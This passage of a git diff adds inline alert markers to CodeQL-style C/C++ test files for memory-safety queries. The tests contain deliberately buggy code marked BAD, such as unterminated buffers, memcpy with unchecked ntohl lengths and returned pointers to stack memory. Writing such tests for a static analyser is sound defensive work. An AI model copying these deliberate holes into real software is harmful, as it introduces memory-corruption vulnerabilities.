strcpy(buffer1, "content"); strdup(buffer1); // GOOD @@ -79,8 +79,8 @@ void test_unassigned() strdup(ptr); // GOOD ptr = buffer2; - strdup(buffer2); // BAD - strdup(ptr); // BAD + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] + strdup(ptr); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -91,7 +91,7 @@ void test_unassigned() strcpy(buffer, "content"); strdup(buffer); // GOOD } - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -114,7 +114,7 @@ void test_unassigned() strcpy(buffer, "content"); strdup(buffer); // GOOD } - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } } @@ -128,7 +128,7 @@ void test_caller() char buffer[1024]; test_callee("content", buffer); // GOOD - test_callee(buffer, "content"); // BAD + test_callee(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } void test_readlink(int fd, const char *path, size_t sz) @@ -137,7 +137,7 @@ void test_readlink(int fd, const char *path, size_t sz) char buffer[1024]; readlink(path, buffer, sizeof(buffer)); - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -145,7 +145,7 @@ void test_readlink(int fd, const char *path, size_t sz) int v; readlinkat(fd, path, buffer, sizeof(buffer)); - v = strlen(buffer); // BAD + v = strlen(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -180,7 +180,7 @@ void test_readlink(int fd, const char *path, size_t sz) memset(buffer, 0, sizeof(buffer)); readlink(path, buffer, sizeof(buffer)); - strdup(buffer); // BAD + strdup(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -233,7 +233,7 @@ void test_strcat() { char buffer[1024]; - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -261,7 +261,7 @@ void test_strcat() char buffer[1024]; buffer[0] = 'a'; - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -282,7 +282,7 @@ void test_strcat() char buffer[1024]; doNothing(buffer); - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -299,7 +299,7 @@ void test_strcat() *buffer_ptr = 0; strcat(buffer1, "content"); // GOOD - strcat(buffer2, "content"); // BAD + strcat(buffer2, "content"); // BAD // $ Alert[cpp/improper-null-termination] strcat(buffer_ptr, "content"); // GOOD buffer_ptr = buffer2; @@ -311,7 +311,7 @@ void test_strcat() char *buffer_ptr = buffer; *buffer_ptr = 'a'; - strcat(buffer, "content"); // BAD + strcat(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -333,7 +333,7 @@ void test_strlen(bool cond1, bool cond2) { { char buffer[1024]; - int i = strlen(buffer); // BAD + int i = strlen(buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -418,7 +418,7 @@ void test_strcpy() char buffer1[1024]; char buffer2[1024]; - strcpy(buffer1, buffer2); // BAD + strcpy(buffer1, buffer2); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -445,13 +445,13 @@ void test_wrappers() { char buffer[1024]; - strcatWrapper(buffer, "content"); // BAD + strcatWrapper(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } { char buffer[1024]; - strcatWrapper2(buffer, "content"); // BAD + strcatWrapper2(buffer, "content"); // BAD // $ Alert[cpp/improper-null-termination] } } @@ -463,7 +463,7 @@ void test_read_fread(int read_src, FILE *s) char buffer[buffer_size]; read(read_src, buffer, buffer_size * sizeof(char)); - strlen(buffer); // BAD + strlen(buffer); // BAD // $ Alert[cpp/user-controlled-null-termination-tainted] } { @@ -478,7 +478,7 @@ void test_read_fread(int read_src, FILE *s) char buffer[buffer_size]; fread(buffer, sizeof(char), buffer_size, s); - strlen(buffer); // BAD + strlen(buffer); // BAD // $ Alert[cpp/user-controlled-null-termination-tainted] } { @@ -510,13 +510,13 @@ void test_printf(char *str) { char buffer[1024]; - printf(buffer, ""); // BAD + printf(buffer, ""); // BAD // $ Alert[cpp/improper-null-termination] } { char buffer[1024]; - printf("%s", buffer); // BAD + printf("%s", buffer); // BAD // $ Alert[cpp/improper-null-termination] } { @@ -555,7 +555,7 @@ void test_reassignment() strcpy(buffer_ptr, "content"); // null terminates buffer1 buffer_ptr = buffer2; - strdup(buffer2); // BAD + strdup(buffer2); // BAD // $ Alert[cpp/improper-null-termination] } { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref index 58e62b13e6d6..d01f3942fc53 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/NtohlArrayNoBound.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/NtohlArrayNoBound.ql \ No newline at end of file +query: Likely Bugs/Memory Management/NtohlArrayNoBound.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp index 24bdaee0f162..514dd72ca19a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/NtohlArrayNoBound/test.cpp @@ -10,7 +10,7 @@ void test1(const char *source, size_t len) char buffer[256]; size_t len2 = ntohl(len); - memcpy(buffer, source, ntohl(len)); // BAD + memcpy(buffer, source, ntohl(len)); // BAD // $ Alert if (len2 < 256) { @@ -19,7 +19,7 @@ void test1(const char *source, size_t len) if (source != 0) { - memcpy(buffer, source, len2); // BAD + memcpy(buffer, source, len2); // BAD // $ Alert } if ((len2 < 256) && (source != 0)) @@ -29,7 +29,7 @@ void test1(const char *source, size_t len) if ((len2 < 256) || (source != 0)) { - memcpy(buffer, source, len2); // BAD + memcpy(buffer, source, len2); // BAD // $ Alert } if (len2 < 256) @@ -59,10 +59,10 @@ void test1(const char *source, size_t len) if (strlen(source) < 256) { - memcpy(buffer, source, len2); // BAD + memcpy(buffer, source, len2); // BAD // $ Alert } - buffer[len2] = 0; // BAD + buffer[len2] = 0; // BAD // $ Alert if (len2 < 256) { @@ -71,7 +71,7 @@ void test1(const char *source, size_t len) { unsigned short lens = len2; - buffer[lens] = 0; // BAD + buffer[lens] = 0; // BAD // $ Alert } if (len2 < 256) @@ -84,7 +84,7 @@ void test1(const char *source, size_t len) if (len3 < 256) { len3 = ntohl(len); - buffer[len3] = 0; // BAD + buffer[len3] = 0; // BAD // $ Alert } } @@ -92,7 +92,7 @@ void test2(size_t len) { char buffer[256]; - buffer[len] = 0; // BAD + buffer[len] = 0; // BAD // $ Alert } void test3(size_t len) @@ -104,5 +104,5 @@ int test4(const char *source, size_t len) { char buffer[256]; - return memcmp(buffer, source, ntohl(len)); // BAD + return memcmp(buffer, source, ntohl(len)); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref index 614ac0198bec..48d907018a89 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/More64BitWaste.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/Padding/More64BitWaste.ql \ No newline at end of file +query: Likely Bugs/Memory Management/Padding/More64BitWaste.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp index 0703d4dfe78e..c30d492d13bd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/More64BitWaste/test.cpp @@ -14,7 +14,7 @@ struct test3 int x, y, z; }; -struct test4 // BAD +struct test4 // BAD // $ Alert { int a; long long b; @@ -26,7 +26,7 @@ struct test5 int b; }; -struct test6 // BAD +struct test6 // BAD // $ Alert { char as[4]; long long b; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref index ee9f4a7debb7..7ba5352553d7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/NonPortablePrintf.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/Padding/NonPortablePrintf.ql \ No newline at end of file +query: Likely Bugs/Memory Management/Padding/NonPortablePrintf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp index e197819ba10f..7408440fa037 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/NonPortablePrintf/test.cpp @@ -7,10 +7,10 @@ void test1() void *ptr; printf("%ld\n", l); // GOOD - printf("%d\n", l); // BAD + printf("%d\n", l); // BAD // $ Alert printf("%p\n", ptr); // GOOD - printf("%d\n", ptr); // BAD - printf("%u\n", ptr); // BAD - printf("%x\n", ptr); // BAD + printf("%d\n", ptr); // BAD // $ Alert + printf("%u\n", ptr); // BAD // $ Alert + printf("%x\n", ptr); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref index 3ad68ed8cec5..26c576ecaf97 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/Suboptimal64BitType.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/Padding/Suboptimal64BitType.ql \ No newline at end of file +query: Likely Bugs/Memory Management/Padding/Suboptimal64BitType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c index e4f86df394e2..14533d574971 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/Padding/Suboptimal64BitType/types.c @@ -8,7 +8,7 @@ // - 6 bytes: char d[6] // - 2 bytes: trailing padding // Optimal layout removes 8 bytes padding, leaves 2 bytes trailing padding. -typedef struct a { +typedef struct a { // $ Alert int a; double b; int c; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref index 2cad0c8bd7f7..b24ce18e5839 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/PointerOverflow.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/PointerOverflow.ql +query: Likely Bugs/Memory Management/PointerOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp index f4d3dbfe1814..7baf2b138e8d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/PointerOverflow/test.cpp @@ -3,7 +3,7 @@ bool check_pointer_overflow(P *ptr) { // x86-64 gcc 9.2 -O2: deleted // x86-64 clang 9.9.9 -O2: deleted // x64 msvc v19.22 /O2: not deleted - return ptr + 0x12345678 < ptr; // BAD + return ptr + 0x12345678 < ptr; // BAD // $ Alert } bool check_pointer_overflow(P *ptr, P *ptr_end) { // x86-64 gcc 9.2 -O2: not deleted @@ -30,7 +30,7 @@ typedef unsigned long size_t; bool not_in_range_bad(Q *ptr, Q *ptr_end, size_t a) { return ptr + a >= ptr_end || // GOOD (for the purpose of this test) - ptr + a < ptr; // BAD + ptr + a < ptr; // BAD // $ Alert } bool not_in_range_good(Q *ptr, Q *ptr_end, size_t a) { @@ -46,9 +46,9 @@ extern "C" void abort(void); #define MYASSERT(cond) if (cond) abort() void assert_not_in_range_bad(Q *ptr, Q *ptr_end, size_t a) { - MYASSERT(ptr + a >= ptr_end || ptr + a < ptr); // BAD + MYASSERT(ptr + a >= ptr_end || ptr + a < ptr); // BAD // $ Alert MYASSERT(ptr + a >= ptr_end); // GOOD (for the purpose of this test) - MYASSERT(ptr + a < ptr); // BAD + MYASSERT(ptr + a < ptr); // BAD // $ Alert } #define IS_LESS_THAN(lhs, rhs) ((lhs) < (rhs)) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref index e8864277b4fd..1921529a00be 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/ReturnCstrOfLocalStdString.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/ReturnCstrOfLocalStdString.ql +query: Likely Bugs/Memory Management/ReturnCstrOfLocalStdString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp index c27cb77b1d89..9d34364339d2 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnCstrOfLocalStdString/test.cpp @@ -21,7 +21,7 @@ namespace std { const char* bad000() { std::string localStr("Test string"); - return localStr.c_str(); + return localStr.c_str(); // $ Alert } const char* good001(const std::string& p) { @@ -29,7 +29,7 @@ const char* good001(const std::string& p) { } const char* bad001() { - return std::string("Test string").c_str(); + return std::string("Test string").c_str(); // $ Alert } @@ -42,7 +42,7 @@ class _JNIEnv { jstring get_hello(_JNIEnv *env) { std::string hello = "Hello world"; - return env->NewStringUTF(hello.c_str()); + return env->NewStringUTF(hello.c_str()); // $ Alert } void good002_helper(std::string*); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected index 6aa457b1e8a4..f53047761409 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected @@ -1,3 +1,20 @@ +#select +| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | +| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | +| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | +| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | +| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | +| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | +| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | +| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | +| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. | test.cpp:134:8:134:10 | arr | arr | +| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | +| test.cpp:177:10:177:23 | Convert: (void *)... | test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | +| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | +| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | +| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | +| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | +| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | edges | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | | test.cpp:23:17:23:19 | & ... | test.cpp:23:17:23:19 | & ... | @@ -114,20 +131,3 @@ nodes | test.cpp:249:13:249:20 | call to strndupa | semmle.label | call to strndupa | | test.cpp:250:9:250:10 | (void *)... | semmle.label | (void *)... | | test.cpp:250:9:250:10 | s2 | semmle.label | s2 | -#select -| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | -| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | -| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | -| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | -| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | -| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | -| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | -| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | -| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. | test.cpp:134:8:134:10 | arr | arr | -| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | -| test.cpp:177:10:177:23 | Convert: (void *)... | test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | -| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | -| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | -| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | -| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | -| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref index 9ca456820068..f35aff41b04b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/ReturnStackAllocatedMemory.ql +query: Likely Bugs/Memory Management/ReturnStackAllocatedMemory.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp index 07e3520fa814..45d1431c04d4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/test.cpp @@ -14,15 +14,15 @@ MyClass *test1() { MyClass mc; - return &mc; // BAD + return &mc; // BAD // $ Alert } MyClass *test2() { MyClass mc; - MyClass *ptr = &mc; + MyClass *ptr = &mc; // $ Source - return ptr; // BAD + return ptr; // BAD // $ Alert } MyClass *test3() @@ -36,22 +36,22 @@ MyClass *test3() MyClass *test4() { MyClass mc; - MyClass &ref = mc; + MyClass &ref = mc; // $ Source - return &ref; // BAD + return &ref; // BAD // $ Alert } MyClass &test5() { MyClass mc; - return mc; // BAD + return mc; // BAD // $ Alert } int *test6() { MyClass mc; - return &(mc.a); // BAD + return &(mc.a); // BAD // $ Alert } MyClass test7() @@ -86,10 +86,10 @@ MyClass *test11() { MyClass mc; - ptr = &mc; + ptr = &mc; // $ Source } - return ptr; // BAD + return ptr; // BAD // $ Alert } MyClass *test12(MyClass *param) @@ -109,14 +109,14 @@ char *testArray1() { char arr[256]; - return arr; // BAD + return arr; // BAD // $ Alert } char *testArray2() { char arr[256]; - return &(arr[10]); // BAD + return &(arr[10]); // BAD // $ Alert } char testArray3() @@ -131,10 +131,10 @@ char *testArray4() char arr[256]; char *ptr; - ptr = arr + 1; + ptr = arr + 1; // $ Source ptr++; - return ptr; // BAD + return ptr; // BAD // $ Alert } char *testArray5() @@ -167,27 +167,27 @@ char *returnAfterCopy() { void *conversionBeforeDataFlow() { int myLocal; - void *pointerToLocal = (void *)&myLocal; // has conversion - return pointerToLocal; // BAD + void *pointerToLocal = (void *)&myLocal; // has conversion // $ Source + return pointerToLocal; // BAD // $ Alert } void *arrayConversionBeforeDataFlow() { int localArray[4]; - int *pointerToLocal = localArray; // has conversion - return pointerToLocal; // BAD + int *pointerToLocal = localArray; // has conversion // $ Source + return pointerToLocal; // BAD // $ Alert } int &dataFlowThroughReference() { int myLocal; - int &refToLocal = myLocal; // has conversion - return refToLocal; // BAD + int &refToLocal = myLocal; // has conversion // $ Source + return refToLocal; // BAD // $ Alert } int *&conversionInFlow() { int myLocal; int *p = &myLocal; - int *&pRef = p; // has conversion in the middle of data flow - return pRef; // BAD + int *&pRef = p; // has conversion in the middle of data flow // $ Source + return pRef; // BAD // $ Alert } namespace std { @@ -234,20 +234,20 @@ void f() { void *alloca(size_t); void* test_alloca() { - void* p = alloca(10); - return p; // BAD + void* p = alloca(10); // $ Source + return p; // BAD // $ Alert } char *strdupa(const char *); char *strndupa(const char *, size_t); char* test_strdupa(const char* s) { - return strdupa(s); // BAD + return strdupa(s); // BAD // $ Alert } void* test_strndupa(const char* s, size_t size) { - char* s2 = strndupa(s, size); - return s2; // BAD + char* s2 = strndupa(s, size); // $ Source + return s2; // BAD // $ Alert } int* f_rec(int *p) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref index 9442d89a36d5..c5fff4b22340 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/StackAddressEscapes.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StackAddressEscapes.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StackAddressEscapes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp index 8b73bffb04ab..02a67eb9761b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/manager.cpp @@ -48,7 +48,7 @@ manager *test_managers() std::vector vs; a.set_strings(vs); // BAD: stack address `&vs` escapes [NOT DETECTED] - glob_man = &man; // BAD: stack address `&man` escapes + glob_man = &man; // BAD: stack address `&man` escapes // $ Alert return &man; // BAD: stack address `&man` escapes [NOT DETECTED] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp index 19cfd214e180..34717346978f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StackAddressEscapes/test.cpp @@ -19,7 +19,7 @@ int test101() { int x = 0; // BAD: local address is written to a static variable, which could // be unsafe. - s101.p = &x; + s101.p = &x; // $ Alert return x; } @@ -28,7 +28,7 @@ int test102() { static struct S100 s102; // BAD: local address is written to a local static variable, which could // be unsafe. - s102.p = &x; + s102.p = &x; // $ Alert return x; } @@ -36,7 +36,7 @@ void test103(int *p) { static struct S100 s103; // BAD: address is written to a local static variable, which could // be unsafe. - s103.p = p; + s103.p = p; // $ Alert } // Helper for test103. @@ -75,7 +75,7 @@ int test105() { p3++; // BAD: local address is written to a static variable, which could // be unsafe. - s101.p = p3; + 